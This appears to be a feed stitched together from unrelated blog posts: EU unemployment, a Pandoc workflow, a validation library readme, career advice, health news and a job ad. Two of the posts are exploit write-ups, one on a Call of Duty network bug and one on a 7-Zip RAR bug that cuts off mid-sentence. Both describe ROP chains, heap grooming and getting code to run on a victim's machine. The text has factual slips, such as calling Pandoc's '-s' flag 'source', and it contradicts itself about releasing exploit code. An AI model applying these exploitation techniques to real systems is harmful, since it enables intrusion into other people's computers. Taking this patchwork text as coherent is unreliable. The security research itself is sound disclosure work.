The following map, from Eurostat, shows the unemployment rate in every region of Europe and Turkey as of 2017.

As the map clearly illustrates, there is a sharp divide between the low unemployment rates (blue) that persist in nearly every region of ‘Northern Europe’ and the higher unemployment rates that persist virtually everywhere else (tan, orange, and red). Germany, Switzerland, Austria, the Netherlands, the UK, Norway, and Denmark have only a few regions where the unemployment rate exceeds 5.7% and just one where the unemployment rate exceeds 9.5%. Conversely, there are only two regions/counties within all of France, Spain, Portugal, Italy, Greece, Ireland, Finland, Estonia, Latvia, Lithuania, Croatia, and Slovenia where the unemployment rate is below 5.8%, a level generally considered to indicate a healthy labor market.

The economic division and nonperformance of the European Union is a theme that we have discussed frequently here at The Sounding Line. The EU is experiencing: falling wages, growing economic inequality, declining workforce participation, some of the worst bad debt ratios in the world, the highest effective tax burden in the developed world, nearly the slowest inflation adjusted economic growth in the world this century, the highest concentration of public workers among developed economies, surging capital flow imbalances, and declining productivity. All of this is has happened despite the European Central Bank maintaining interest rates at record negative lows and printing more money than any other central bank in the history of the world. Despite all of this, despite UK voters deciding to leave the EU nearly two years ago, and despite Italian voters’ recent abandonment of pro-EU parties, the leadership of the EU has put forward virtually no concrete structural, regulatory, or tax reforms to make the EU’s economy more competitive. To the contrary, the EU appears to be doubling down on higher taxes and more federalization.

Just imagine what will happen whenever the next recession eventually arrives.

P.S. If you would like to be updated via email when we post a new article, please click here. It’s free and we won’t send any promotional materials.

A Call of Duty exploit

$
0
0

⚠️ This article expects you to have at least basic knowledge about the x86 architecture and assembly language. ⚠️

A few years ago, I became aware of a security issue in most Call of Duty games.
Although I did not discover it myself, I thought it might be interesting to see what it could be used for.

Without going into detail, this security issue allows users playing a Call of Duty match to cause a buffer overflow on the host’s system inside a stack-allocated buffer within the game’s network handling.
In consquence, this allows full remote code execution!

To use this vulnerability to exploit the game, a few things have to be taken into consideration.
To exploit this vulnerability (or actually any vulnerability), you need to replicate the network protocol of the game.
This turns out to be somewhat complex, so I decided not to rewrite this myself but to actually use the game as a base and to simply force it into sending malicious hand-crafted packets that exploit it.

And indeed, this method seems to work, but the problem is that you need to modify the game in order to send the packets.
As Call of Duty has, just like any modern game these days, a not-so-bad anticheat mechanism (namely VAC), modifying it could result in myself getting banned from the game.

After a few other failed attempts of exploiting this vulnerability, I came up with something completely different: Why shouldn’t I use the game, without actually using the game?

The idea is still to take the game as base, but instead of hooking it, the underlying network transactions are analyzed to recreate the state of the game and to inject custom packets into the system’s network stack that look as if they were sent by the game.
So you don’t modify the game itself, but rather control all the data it sends and receives.
As this method doesn’t touch the game at all, it is not possible for current anti-cheat systems to detect this (it actually is possible, but I don’t think there is any anti-cheat that tries to detect that, yet).

I’m probably not the first one to come up with this idea, but I have never heard of something like this before (to be fair, I’m not very familiar with game hacking and cheating in general).

To realize this idea, I decided to go with the game Modern Warefare 2. Even though this game is pretty old, some people still play it. As this security issue exists in most Call of Duty games (even up to the latest title, World War II), I could have used any game as base, but every title released after MW2 has some kind of TLS layer underlying the network traffic which makes the analysis process much harder. Although it’s not impossible, I didn’t want to spend my time on reverse engineering it, as this should only be a proof-of-concept.

To capture the network traffic of the game, I decided to go with WinDivert. I could have used libpcap instead, but I wanted to use WinDivert, as it provides a small abstration to the network stack, because you don’t
have to deal with the underlying ethernet protocol and chosing the right network interface with the correct MAC address.

As this step was done, it’s time to analyze the network traffic.
The sad news is, even though I don’t have to understand the whole network protocol of the game, I still do have to replicate it partially, to be able to build custom packets.
This took some time, but I finally managed to get it done, at least to a certain extent at which the game accepted my custom packets and decrypted them correctly.
Looking at the Quake 3 network protocol helped a lot, as Call of Duty and Quake share a similar protocol due to using nearly the same engine.

Here is where the interesting part starts:
Now that it is possible to inject packets into the game, we can start exploiting the vulnerability!
With the help of Return-oriented programming it is actually possible to write code, by just having access to the stack.
At first, it was necessary to rewind the stack to be able to use entire buffer to execute code, and not just the overflowing part.
So to do that I had to execute shellcode that looks similar to this:

sub esp, ###
retn

This piece of assembly language tells the system to rewind the stack by ### bytes. Where ### represents the length of the buffer we have access to plus the number of bytes we are overflowing.
To achieve that, it is required to write that code into the host’s system at a place that allows code execution.
Sadly, there is no space in memory with execution rights which is writable. At least there is no space I know of.
The way to go was to make the system call VirtualAlloc to allocate memory with enough rights to write and execute memory (essentially: PAGE_EXECUTE_READWRITE).
As the game itself uses VirtualAlloc to allocate memory, I looked up the address in the game’s Import Address Table.
Now to call that function, it is required to dereference the entry in the IAT and to pass all parameters accordingly, but most importantly, the return value has to be stored somewhere, as this is essentially the pointer to the memory we want to write our code to.
Using a set of ROP-Gadgets I discovered, I managed to get the game to dereference the address to the IAT in multiple steps and to call the function (which is VirtualAlloc).
Passing the parameters is easy, as we can simply push them onto the stack in reversed order (at least with x86, x64 would be a bit harder due to having a different calling convention).
Saving the return value requires to store it at a known address, so I took a pointer to some piece of data, that I was sure the game would not require anymore (I used the location at which the game stores a handle to the splash screen window, which only appears when the game starts).

Now that we have executable and writable memory, we simply have to write our shellcode to it.
Note that we still have the target memory address in the eax register.
Having that in mind, I found a few other interesting gadgets which could help:

pop ecx
retn

mov [eax], ecx
retn

add eax, 3
retn

add eax, 1
retn

The first gadget allows to pop 4 bytes from the stack into the ecx register.
The second one allows to copy the data from ecx into the memory to which eax points (eax still stores the address of the memory we allocated).
As this only allows to write 4 bytes into memory, we have to increment eax by 4, to be able to write another 4 bytes.
Unfortunately, I did not find a gadget that increments eax by 4, but luckily it can be increased by 3 in one and then 1 in another step (3 + 1 = 4 💪).
Using that, we can devide the stack-rewinding shellcode into 4 byte blocks and write it into memory block by block.

Once this is done, it still has to be executed. To do that, we need to get our intial pointer back (which we luckily stored at the place where the game stored its splashscreen).
Using

pop edx
retn

we can tell the game to put the value of the splash screen address into edx, so a pointer to our memory pointer.

Using

mov eax, [edx]
retn

we can dereference it into eax which allows us to execute it using the last gadget:

jmp eax

No we have access to the whole buffer for executing code!
Additionally, as I care about the host, I of course have to free the reserved memory again by calling VirtualFree the same way I called VirtualAlloc before.

To make my life easier, I turned this whole step of allocating memory, writing to it, executing it and freeing it, into a macro that allows to easily execute any kind of assembly code that I want.

Unfortunately, by overflowing the buffer and writing to the stack, we actually destroy the whole stack of the game, which forces it either to crash (if it executes arbitrary operations on the stack past our code), or to terminate gracefully if we tell it to do so.

Luckily, I discovered a way out!
When starting a thread, every Call of Duty game stores the context of the current thread in the thread’s local storage area using setjmp.
We can use that to restore the context to what it was before by loading it from the TLS and passing it to longjmp.

Now that we have full control, we can execute any code we want and restore the context to continue the execution of the game.

Using that we can for example draw hud elements, which is basically an element on the screen that every user you play with sees (e.g. text).
We could also change the map or change the game configuration to make players run faster, or whatnot.
A thing to note is that as we’re executing code in the process of the current match’s host, it is still possible that the host’s anti-cheat system detects this as a cheat. As we’re not doing anything in our process, but in someone else’s, we are perfectly safe.
However, I did not modify any memory of the game that is protected or do anything that could let the anti-cheat system think that the host is cheating, so he should be safe as well.

With that said, we can do any kind of crazy stuff. Here you can see a demo of me changing the map, displaying the hud element You have been hacked on everyone’s screen and increasing the speed:

To sum it up, this tool allows to control the game by analyzing the network traffic and executing code on the host’s system using injected packets.
It could also be used to harm the host by accessing his filesystem, or downloading an executable file and executing it or doing similar things on his computer. To prevent others from using this tool to do this, it is not possible for me to publish the code. As the vulnerability has been patched, the code is available on GitHub.
Other than that, I’m happy that it works, as I haven’t seen any kind of ‘hack’ like this before (although I’m pretty sure they exist).

How I wrote my book using Markdown, Pandoc, and a little help from the internet

$
0
0

Did I mention recently that I just wrote a book? I hope you’re not tiring of the self-promotion here and on my social media feeds, but I’m very happy with how the book turned out, and I want as many people as possible to get their hands on it. I had a great experience researching and writing this book. But when I started, I had no experience at all with the process of actually writing a book. I had to do a lot of research not only on things like cognitive psychology and pedagogical practices, I also had to figure the technical process of putting a book together.

With a project this complex, it turns out that you can’t just open up a word processor and start typing. There are issues to consider that don’t have a single right answer, and I had to figure out a way to deal with them that worked for me and my workflow. I got a lot of help from blog posts and articles about this as I was writing, so I wanted to share what I learned about all this in hopes that it helps others.

Fair warning: A lot of what I am about to describe can charitably be called “hacks”. There are probably simpler and better ways to do just about everything you will see. If you have an idea for improvement, leave it in the comments.

Markdown as the center of my writing universe

First of all, you have to understand how committed I am to using Markdown.

Markdown is a text processing platform that emphasizes making text readable while maintaining simplicity of form. If you’re new to Markdown, start here and then read anything you can about it, and try it out online or in a text editor. It would be a huge understatement to say that I am a fan of Markdown. Markdown for me is closer to being a lifestyle choice than a text processing system. I love Markdown: I love its simplicity, its portability, its lightweightness, its future-proof-ness. I write everything in Markdown unless there is a good reason not to: reports, syllabi, emails, even my blog posts and grocery lists.

By writing in Markdown, and keeping the content of my writing in what’s essentially plain text, I can open and edit it basically anywhere and on any device without worrying about compatibility. On my Mac, I write mostly in Atom, or sometimes in Sublime Text or Typora if I am wanting a change of pace. If I’m not around my Mac I can use Editorial on my iPad. If all I have is a web browser I can use StackEdit. The language itself is agnostic to hardware and operating system; it’s just plain text with a little spice added. Because it’s based on plain text, it’s uncomplicated, files stay small, and I know those files will be readable and editable 100 years from now.

At the very first stage of writing my book, I knew that I really, really wanted to write it in Markdown.

But…

My publisher, Stylus Publications, has been an absolute joy to work with. They have been supportive from the very beginning and are currently doing a great job marketing it. Everyone involved with Stylus, from my editor down to the person who arranges flyers for conferences, has been great.

But, Stylus doesn’t do Markdown. Stylus only works with Word documents.

It makes sense. I’m not a huge fan of Word, but one thing it does very well is track changes. Once I submitted the manuscript last August, it began a back-and-forth process where my main editor suggested large-scale changes; I made those and sent them back in; then there was a sequence of exchanges for copy editing where a large number of smaller detailed changes were proposed. By “large number”, I mean hundreds, ranging from typos to correct up to complete restructuring of paragraphs and sections. And not all of those proposed changes were ones that I wanted to make, at least in the way the editor suggested. So we had to have a way of proposing changes, accepting or rejecting or modifying them, and keeping track of them. Word is probably the best choice for that.

However, I didn’t relish the thought of writing a 300-page book in Word, to say the least. So I needed to devise a way to deliver a final product in Word, without actually writing it in Word.

Enter Pandoc

Fortunately I didn’t have to look very far. There’s already a great tool for doing what I wanted, and I had actually been using it for some time now: Pandoc.

Pandoc is a command-line program that basically changes any kind of (text-based) file into any other kind of (text-based) file. For example, you can use it to convert Word documents to HTML, LaTeX files to Word (with equations formatted!), plain text to ePub, and so on and so on. In particular, you can easily convert Markdown to Word. To convert foo.md to foo.docx, just navigate to the directory where foo.md is located and type

pandoc -s foo.md -o foo.docx

The -s stands for “source” and the -o stands for “output”. And that’s that — the Word-ified version of the Markdown file will just be sitting there in the same directory as the source.

So my plan became:

  1. Write each individual chapter as its own separate Markdown file. I wrote the book with the philosophy of keeping individual chapters short; this way it would be simple to compartmentalize all the individual pieces of the book.
  2. Combine all the Markdown files into one mega-file when done.
  3. Convert the mega Markdown file to Word with Pandoc.

There was one big obstacle to overcome if I was going to do it this way: Handling my references.

Managing references with BiBTeX

If you’ve ever written a journal article, you know that managing those references can be tricky. Each actual reference in the text has to be tagged with some kind of abbreviated information about it. Sometimes this is a number (for example, “[3]”) that points to a spot in a bibliography at the end where the full reference is given; sometimes it’s a list of the authors with publication date (for example, “(Lennon and McCartney, 1964)”). And there are different styles for citations like this.

Citing references in published work is at once extremely important — a core concept of scholarship being transparency in one’s sources — and unbelievably fragile. What if you write a 50-page paper that references an article 20 times, all with the label “[3]”, and then in the revision process you add or subtract a reference so that “[3]” is no longer the third reference in the bibliography? You don’t want to manually hunt down and change all the [3]’s; it’s mildly annoying in a 20-page paper and potentially insanity-producing in a 300-page book, and the possibility of missing one of those references is high. I didn’t actually count how many references my book has, but the references section is a solid eight pages long, including references to books, journal articles, websites, unpublished manuscripts, privately-conducted interviews, and more. So this was a big issue.

What you need is a way to automate references. For example, if that paper by Lennon and McCartney could be coded in as LennonMcCartney1964, and there were a system that allowed you to type in LennonMcCartney1964 whenever you referenced it and then automatically generate the bibliography at the end with the correct numbering, then keeping track of the [3]’s is no longer an issue. Fortunately, this system exists and has been used for decades, and it’s called BiBTeX.

BiBTeX is normally associated with documents written up using LaTeX, a markup language used for writing mathematical and technical documents. We mathematicians use LaTeX like we use oxygen; it’s the one technology that all mathematicians use. If I were writing a LaTeX document and I wanted to cite the Lennon and McCartney 1964 paper, I would just need to:

  1. Create a plain text file and enter in the citation info for the paper using BiBTeX’s format syntax. One piece of that syntax is a handle used for referring to the paper, for example LennonMcCartney1964.
  2. Go to the place where I want to cite the paper and type: \cite{LennonMcCartney1964}.
  3. Make sure the LaTeX source document has a few lines of code in it that tell it to process the BiBTeX file. And then,
  4. Just compile the LaTeX document. LaTeX takes care of auto-numbering the references and if these change in your text, the references will change when compiled again.

So BiBTeX is the right solution if you’re using a LaTeX document. Which I wasn’t. I’m a Markdown guy, remember?

Making BiBTeX work with Markdown and Pandoc

Fortunately, I stumbled across this blog post by seminary student Chris Krycho that gave me my final solution. It turns out that Pandoc can handle BiBTeX like a boss, even when the references are in Markdown files and not LaTeX files.

The way it works is like this.

First, create a BiBTeX file for the references just as if you were using LaTeX. For the book, I used BibDesk, a free tool for managing BiBTeX files. But you could just use a text file for this. Here’s what BibDesk looks like with one of the references highlighted.

Then, in the Markdown file, whenever a reference is made, you just put the citation key for the reference prepended with an @ symbol. For example, the reference for the Linda Nilson book shown above has the citation key nilson2013creating. So when I want to cite it, I just type in @nilson2013creating like so:

This citation syntax is the Markdown analog of the LaTeX command \cite{nilson2013creating}. When the Markdown file is processed, that citation will turn into a formatted citation using a style that I can specify. How is this “processing” done, you ask? Using Pandoc. The command to get Pandoc to do all this is:

pandoc foo.md --smart --standalone --bibliography /.../talbertlibrary.bib -o foo.docx

where foo.md is the source Markdown file and /.../talbertlibrary.bib is the complete path to the location of the BiBTeX file that stores your references. (Mine was called talbertlibrary.bib.) The options being passed to Pandoc are:

  • --smart: This makes the typography look nice (converting dashes to em-dashes, etc.) and has nothing to do with the bibliography. But for the publisher, it matters.
  • --standalone: The documentation says “Produce output with an appropriate header and footer”. Honestly I’m not sure what happens if you leave it out. I found it on the internet and didn’t want to mess with it.
  • --bibliography: This is the parameter that tells Pandoc that you are pulling references from a bibliography. This is followed by the path to the BiBTeX file. The @ syntax is rendered automatically.

Again, once Pandoc is run, it produces a Word file. Here’s a screenshot from the results:

Very importantly: Pandoc also puts all the references at the end of the output file in an alphabetically ordered list. So you end up with a bibliography.

Finishing touches

Once I ran Pandoc on the mega Markdown file, I had a nicely formatted Word document with automatic references and a bibliography. All I needed to do to finish it was:

  • Add a cover page, which the publisher wanted. Trivial to do in Word.
  • Add a table of contents. This can be done in Markdown with Pandoc but it’s easier to do in Word, especially since the header syntax in Markdown that uses the # symbol creates actual headers in Word, and Word’s table-of-contents generator uses headers to do its thing, which requires just a single menu selection.
  • On a couple of occasions, some of the images I had included with Markdown syntax didn’t look right after Pandoc. For example there were a couple of images that needed to go side-by-side, and there’s no way I know of to do this in Markdown. It was simpler to just add those after Pandoc.

And with that, I had a manuscript that was ready to go to the publisher, without doing any actual writing in Word.

Moving forward from there, everything was done in Word, again because that’s the standard file format that my publisher uses and it was important to track changes. But I’m OK with that, since none of the changes I made involved large amounts of actual writing.

Conclusion

Just as a postscript, my book doesn’t have a lot of math notation in it, but if it did, I could still use this workflow since Pandoc can render LaTeX expressions found in Markdown files, using MathJax. All you have to do is add --mathjax to the Pandoc command:

pandoc foo.md --mathjax --smart --standalone --bibliography /.../talbertlibrary.bib -o foo.docx

This produces a Word file with LaTeX-rendered equations in it. Or if you need the output to be a PDF, just change the .docx to .pdf; similarly if you want a plain LaTeX file, change it to .tex.

It’s always the case that you should use the best tools for the job. For writing my book, that tool was Markdown and a text editor for the writing portion; plus BibDesk for managing my references; and then Word for making it all look nice. I was really pleased to find ways to make all these interact, and I would strongly lean toward using this tool stack for any writing projects in the future.

Have we forgotten how to code?

$
0
0

readme.md

Build StatusCoverage Status

Function argument validation for humans

Highlights

  • Expressive chainable API
  • Lots of built-in validations
  • Supports custom validations
  • Written in TypeScript

Install

$ npm install ow

Usage

importowfrom'ow';const unicorn =input=> {ow(input, ow.string.minLength(5));//};unicorn(3);//=> ArgumentError: Expected argument to be of type `string` but received type `number`unicorn('yo');//=> ArgumentError: Expected string to have a minimum length of `5`, got `yo`

API

Complete API documentation

ow(value, predicate)

Test if value matches the provided predicate.

ow.create(predicate)

Create a reusable validator.

const checkPassword =ow.create(ow.string.minLength(6));checkPassword('foo');//=> ArgumentError: Expected string to have a minimum length of `6`, got `foo`

ow.any(...predicate[])

Returns a predicate that verifies if the value matches at least one of the given predicates.

ow('foo', ow.any(ow.string.maxLength(3), ow.number));

ow.{type}

All the below types return a predicate. Every predicate has some extra operators that you can use to test the value even more fine-grained.

Primitives

Built-in types

Typed arrays

Structured data

Miscellaneous

Predicates

The following predicates are available on every type.

not

Inverts the following predicates.

ow(1, ow.number.not.infinite);ow('', ow.string.not.empty);//=> ArgumentError: [NOT] Expected string to be empty, got ``

is(fn)

Use a custom validation function. Return true if the value matches the validation, return false if it doesn't.

ow(1, ow.number.is(x=>x<10));ow(1, ow.number.is(x=>x>10));//=> ArgumentError: Expected `1` to pass custom validation function

Instead of returning false, you can also return a custom error message which results in a failure.

const greaterThan = (max:number, x:number) => {returnx>max||`Expected \`${x}\` to be greater than \`${max}\``;
};ow(5, ow.number.is(x=>greaterThan(10, x)));//=> ArgumentError: Expected `5` to be greater than `10`

Maintainers

Related

License

MIT

Thought Process of Great Programmers or Developers

$
0
0

Well, today programming is the leading career with the bucket full of dollars but this lead professional field also holds a dark side like the other career options. Everything has its own merits and demerits. Humans are the creator of codes, programming languages, AI and more. Now the question arises what exactly goes in the wires of a coder. Those who always love to gaze over computer screens have an ability to think and to create almost same are the lead achievers in IT era. The rapid changes in the technological field need best brains to accelerate languages quickly with logic. The humans are only the reasons behind the doors of imagination. The field of programmer looks productive but is actually tough. To code everything perfectly is solely based on the work of programmer and creative skills.

great-programmers

The type of professionalism will generate a type of error, so all work fields are equally similar. If we talk about master brains like Bill Gates, Mark Zuckerberg, James Gosling, Steve Jobs and more we will find not all but few of the similarities in their personality. Despite being popular, rich they hold working similarities too. How do they become that great, how they work, How they think are some curious questions to know. Stop wondering about the richness and popularity, it just the game of name.

The Orientations Of Great Programmers

If you have an appetite for being a successful coder, then below mentioned are the key ingredients for the perfect recipe to become a great programmer. We are sure that these personality traits will flourish and nurture a great mind and soul in the programming world.

1. Stop Being Exhausted:

It obvious that the things which need time to tackle are often boring and coding is one of them. To be a programmer be patient, keep yourself calm and stress-free. If you will feel boring of trying with errors and mistakes than what will you present at the office desk. To program a language you need to spend hours in gazing computer screens. So to achieve a name set your back tight and stuck to the code until you will get the excellent program.

2. Cushion Perfectly:

Sitting for hours in the single position, stick to desk and gaze on the screen will mash and crash not only the mind but the body too. This kind of work fields is stressful, hectic and unhealthy. Working for IT firms looks trendy with outlook but this is unhealthy, so make your regime perfect. Cushion up your back, take care of health and code perfectly.

3. Be Your Friend:

Being honest with your skills and energy is the best way to keep self-motivated. Programmer life is not that simple, often client’s opinions don’t match with your skills, or maybe you understand the demand and requirement in wrong way. So never feel disappointed in such bad falls. These downfalls are the sugary crystals in perfect programmer recipe.

4. Sharing is Good Deed:

Humans are not superheroes, we need help and we take help. In every sphere of life, we stuck with issues, often personal, few professionals and we need ideas to collab. If your coding is paused with error, then go for possible reasons, don’t hesitate if you want to seek help. Taking help will not shatter your confidence but will make you learn more to achieve more. Sharing is caring as always said because it opens up new doors for creativeness. Be ready to help and to take help is a meaningful mantra.

5. Bliss Your Work:

Stressing much with workloads will bulk you in pile of tensions, this will lead to slowdowns your current speed. Level of tensions is directly proportional to your performance. Keep yourself calm if loaded to get excellent results. Enjoy your work, flush away all the hectic loads with a bright shine and broad smile.

With our professional teams in Delhi, Gurgaon, Noida and Bangalore you will not only learn to code but also will polish your other personality traits. We provide Android App Development training and much more courses for make great programmers. Polishing and nurturing students with flawless knowledge will boost  up their confidence level to face the practical job world. Learning languages, coding with new interfaces will raise your creative ability and confidence. To be a great programmer think with quick-witty results. Our training institution with various courses will encourage your inner creativity and skills.

Mobile phone cancer warning as malignant brain tumours double

$
0
0

Fresh fears have been raised over the role of mobile phones in brain cancer after new evidence revealed rates of a malignant type of tumour have doubled in the last two decades.

Charities and scientists have called on the Government to heed longstanding warnings about the dangers of radiation after a fresh analysis revealed a more “alarming” trend in cancers than previously thought.

However, the new study, published in the Journal of Public Health and Environment, has stoked controversy among scientists, with some experts saying the disease could be caused by other factors.

The research team set out to investigate the rise of an aggressive and often fatal type of brain tumour known as Glioblastoma Multiforme (GBM).

They analysed 79,241 malignant brain tumours over 21 years, finding that cases of GBM in England have increased from around 1,250 a year in 1995 to just under 3,000.

The study is the first recent effort of its kind to analyse in detail the incidence of different types of malignant tumours.

The scientists at the Physicians’ Health Initiative for Radiation and Environment (PHIRE) say the increase of GBM has till now been masked by the overall fall in incidence of other types of brain tumour.


ZeroCater nabs $12M in funding- Seeking Director of Engineering to grow team

$
0
0

The work we do is bringing tens of thousands of people together every day. Shared meals are a fundamental human experience. To us, food fosters relationships and new ideas. We’re obsessed with improving our customers’ lives by making every meal count.

Creating Delight

Help build a company that’s dedicated to providing a great service that customers love.

Caring Deeply

Collaborate with people who care deeply about the work they do and have a fundamental drive for growth and improvement.

Moving Fast

We favor constant iteration and improvements that make an immediate and measurable difference to our customers.

Solving Difficult Problems

Accomplish great things at a place where you’re encouraged to clear hurdles that others shy away from.

7-Zip: From Uninitialized Memory to Remote Code Execution

$
0
0

After my previous post on the 7-Zip bugs CVE-2017-17969 and CVE-2018-5996, I continued to spend time on analyzing antivirus software. As it happens, I found a new bug that (as the last two bugs) turned out to affect 7-Zip as well. Since the antivirus vendor has not yet published a patch, I will add the name of the affected product in an update to this post as soon as this happens.

Introduction

7-Zip’s RAR code is mostly based on a recent UnRAR version, but especially the higher-level parts of the code have been heavily modified. As we have seen in some of my earlier blog posts, the UnRAR code is very fragile. Therefore, it is hardly surprising that any changes to this code are likely to introduce new bugs.

Very abstractly, the bug can be described as follows: The initialization of some member data structures of the RAR decoder classes relies on the RAR handler to configure the decoder correctly before decoding something. Unfortunately, the RAR handler fails to sanitize its input data and passes the incorrect configuration into the decoder, causing usage of uninitialized memory.

Now you may think that this sounds harmless and boring. Admittedly, this is what I thought when I first discovered the bug. Surprisingly, it is anything but harmless.

In the following, I will outline the bug in more detail. Then, we will take a brief look at 7-Zip’s patch. Finally, we will see how the bug can be exploited for remote code execution.

This new bug arises in the context of handling solid compression. The idea of solid compression is simple: Given a set of files (e.g., from a folder), we can interpret them as the concatenation to one single data block, and then compress this whole block (as opposed to compressing every file for itself). This can yield a higher compression rate, in particular if there are many files that are somewhat similar.

In the RAR format (before version 5), solid compression can be used in a very flexible way: Each item (representing a file) of the archive can be marked as solid, independently from all other items. The idea is that if an item is decoded that has this solid bit set, the decoder would not reinitialize its state, essentially continuing from the state of the previous item.

Obviously, one needs to make sure that the decoder object initializes its state at the beginning (for the first item it is decoding). Let us have a look at how this is implemented in 7-Zip. The RAR handler has a method NArchive::NRar::CHandler::Extract that contains a loop which iterates with a variable index over all items. In this loop, we can find the following code:

Byte isSolid = (Byte)((IsSolid(index) || item.IsSplitBefore()) ? 1: 0);if (solidStart) {
  isSolid = 0;
  solidStart = false;
}

RINOK(compressSetDecoderProperties->SetDecoderProperties2(&isSolid, 1));

The basic idea is to have a boolean flag solidStart, which is initialized to true (before the loop), making sure that the decoder is configured with isSolid==false for the first item that is decoded. Furthermore, the decoder will (re)initialize its state (before starting to decode) whenever it is called with isSolid==false.

That seems to be correct, right? Well, the problem is that RAR supports three different encoding methods (excluding version 5), and each item can be encoded with a different method. In particular, for each of these three encoding methods there is a different decoder object. Interestingly, the constructors of these decoder objects leave a large part of their state uninitialized. This is because the state needs to be reinitialized for non-solid items anyway and the implicit assumption is that the caller of the decoder would make sure that the first call on the decoder is with isSolid==false. We can easily violate this assumption with a RAR archive that is constructed as follows:

  • The first item uses encoding method v1.
  • The second item uses encoding method v2 (or v3), and has the solid bit set.

The first item will cause the solidStart flag to be set to false. Then, for the second item, a new Rar2 decoder object is created and (since the solid flag is set) the decoding is run with a large part of the decoder’s state being uninitialized.

At first sight, this may not look too bad. However, various parts of the uninitialized state can be used to cause memory corruptions:

  1. Member variables holding the size of heap-based buffers. These variables may now hold a size that is larger than the actual buffer, allowing a heap-based buffer overflow.
  2. Arrays with indices that are used to index into other arrays, for both reading and writing values.
  3. The PPMd state discussed in my previous post. Recall that the code relies heavily on the soundness of the model’s state, which can now be violated easily.

Obviously, the list is not complete.

The Fix

In essence, the bug is that the decoder classes do not guarantee that their state is correctly initialized before they are used for the first time. Instead, they rely on the caller to configure the decoder with isSolid==false before the first item is decoded. As we have seen, this does not turn out very well.

There are two different approaches to resolve this bug:

  1. Make the constructor of the decoder classes initialize the full state.
  2. Add an additional boolean member solidAllowed (which is initialized to false) to each decoder class. If isSolid==true even though solidAllowed==false, the decoder can abort with a failure (or set isSolid=false).

UnRAR seems to implement the first option. Igor Pavlov, however, chose to go with a variant of the second option for 7-Zip.

In case you want to patch a fork of 7-Zip or you are just interested in the details of the fix, you might want to have a look atthis file, which summarizes the changes.

On Exploitation Mitigation

In the previous post on the 7-Zip bugs CVE-2017-17969 and CVE-2018-5996, I mentioned the lack of DEP and ASLR in 7-Zip before version 18.00 (beta). Shortly after the release of that blog post, Igor Pavlov released 7-Zip 18.01 with the /NXCOMPAT flag, delivering on his promise to enable DEP on all platforms. Moreover, all dynamic libraries (7z.dll, 7-zip.dll, 7-zip32.dll) have the /DYNAMICBASE flag and a relocation table. Hence, most of the running code is subject to ASLR.

However, all main executables (7zFM.exe, 7zG.exe, 7z.exe) come without /DYNAMICBASE and have a stripped relocation table. This means that not only are they not subject to ASLR, but you cannot even enforce ASLR with a tool like EMET or its successor, the Windows Defender Exploit Guard.

Obviously, ASLR can only be effective if all modules are properly randomized. I discussed this with Igor and convinced him to ship the main executables of the new 7-Zip 18.05 with /DYNAMICBASE and relocation table. The 64-bit version still runs with the standard non-high entropy ASLR (presumably because the image base is smaller than 4GB), but this is a minor issue that can be addressed in a future release.

On an additional note, I would like to point out that 7-Zip never allocates or maps additional executable memory, making it a great candidate for Arbitrary Code Guard (ACG). In case you are using Windows 10, you can enable it for 7-Zip by adding the main executables 7z.exe, 7zFM.exe, and 7zG.exe in the Windows Defender Security Center (App & browser control -> Exploit Protection -> Program settings). This will essentially enforce a W^X policy and therefore make exploitation for code execution substantially more difficult.

Writing a Code Execution Exploit

Normally, I would not spend much time thinking about actual weaponized exploits. However, it can sometimes be instructive to write an exploit, if only to learn how much it actually takes to succeed in the given case.

The platform we target is a fully updated Windows 10 Redstone 4 (RS4, Build 17134.1) 64-bit, running 7-Zip 18.01 x64.

Picking an Adequate Exploitation Scenario

There are three basic ways to extract an archive using 7-Zip:

  1. Open the archive with the GUI and either extract files separately (using drag and drop), or extract the whole archive using the Extract button.
  2. Right-click the archive and select "7-Zip->Extract Here" or "7-Zip->Extract to subfolder" from the context menu.
  3. Using the command-line version of 7-Zip.

Each of these three methods will invoke a different executable (7zFM.exe, 7zG.exe, 7z.exe). Since we want to exploit the lack of ASLR in these modules, we need to fix the extraction method.

The second method (extraction via context menu) seems to be the most attractive one, since it is a method that is probably used very often, and at the same time it should give us a quite predictable behavior (unlike the first method, where a user might decide to open the archive but then extract the “wrong” file). Hence, we go with the second method.

Exploitation Strategy

Using the bug from above, we can create a Rar decoder that operates on (mostly) uninitialized state. So let us see for which Rar decoder this may allow us to corrupt the heap in an attacker-controlled manner.

One possibility is to use the Rar1 decoder. The method NCompress::NRar1::CDecoder::HuffDecode contains the following code:

int bytePlace = DecodeNum(...);// some code omittedbytePlace &= 0xff;// more code omittedfor (;;)
{
  curByte = ChSet[bytePlace];
  newBytePlace = NToPl[curByte++ & 0xff]++;if ((curByte & 0xff) > 0xa1)
    CorrHuff(ChSet, NToPl);elsebreak;
}

ChSet[bytePlace] = ChSet[newBytePlace];
ChSet[newBytePlace] = curByte;
return S_OK;

This is very useful, because the uninitialized state of the Rar1 decoder includes the uint32_t arrays ChSet and NtoPl. Hence, newBytePlace is an attacker-controlled uint32_t, and so is curByte (with the restriction that the least significant byte cannot be larger than 0xa1). Moreover, bytePlace is determined by the input stream, so it is attacker-controlled as well (but cannot be larger than 0xff).

So this would give us a pretty good (though not perfect) read-write primitive. Note, however, that we are in a 64-bit address space, so we will not be able to reach the vtable pointer of the Rar1 decoder object with a 32-bit offset (even if multiplied by sizeof(uint32_t)) from ChSet. Therefore, we will target the vtable pointer of an object that is placed after the Rar1 decoder on the heap.

The idea is to use a Rar3 decoder object for this purpose, which we will use at the same time to hold our payload. In particular, we use the RW-primitive from above to swap the pointer _windows, which is a member variable of the Rar3 decoder, with the vtable pointer of the very same Rar3 decoder object._window points to a 4MB-sized buffer which holds data that has been extracted with the decoder (i.e., it is fully attacker-controlled).

Naturally, we will fill the _window buffer with the address of a stack pivot (xchg rax, rsp), followed by a ROP chain to obtain executable memory and execute the shellcode (which we also put into the _window buffer).

Putting a Replacement Object on the Heap

In order to succeed with the outlined strategy, we need to have full control of the decoder’s uninitialized memory. Roughly speaking, we will do this by making an allocation of the size of the Rar1 decoder object, writing the desired data to it, and then freeing it at some point before the actual Rar1 decoder is allocated.

Obviously, we will need to make sure that the Rar1 decoder’s allocation actually reuses the same chunk of memory that we freed before. A straightforward way to achieve this is to activate Low Fragmentation Heap (LFH) on the corresponding allocation size, then spray the LFH with multiple of those replacement objects. This actually works, but because allocations on the LFH are randomized since Windows 8, this method will never be able to place the Rar1 decoder object in constant distance to any other object. Therefore, we try to avoid the LFH and place our object on the regular heap. Very roughly, the allocation strategy is as follows:

